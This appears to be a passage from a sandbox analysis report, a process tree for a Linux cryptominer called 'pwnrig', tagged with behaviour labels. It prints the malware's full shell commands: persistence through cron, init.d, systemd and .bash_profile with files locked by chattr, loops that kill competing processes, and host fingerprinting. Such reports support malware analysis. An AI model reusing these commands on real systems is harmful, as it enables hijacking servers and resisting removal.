/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- Attempts to change immutable files
-
-
/usr/bin/whichwhich chkconfig4⤵
-
-
/usr/bin/whichwhich update-rc.d4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
- Reads EFI boot settings
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/bin/whichwhich systemctl4⤵
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/awkawk "{print \$1}"4⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/wcwc -l4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Process Discovery
- Reads runtime system information
-
-
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
-
/usr/bin/crontabcrontab -r2⤵
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
-
-
/usr/bin/bashbash -c "echo \"* * * * * /tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Attempts to change immutable files
- Creates/modifies Cron job
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
-
/usr/bin/whichwhich chkconfig4⤵
-
-
/usr/bin/whichwhich update-rc.d4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵
- Reads EFI boot settings
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/bin/whichwhich systemctl4⤵
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
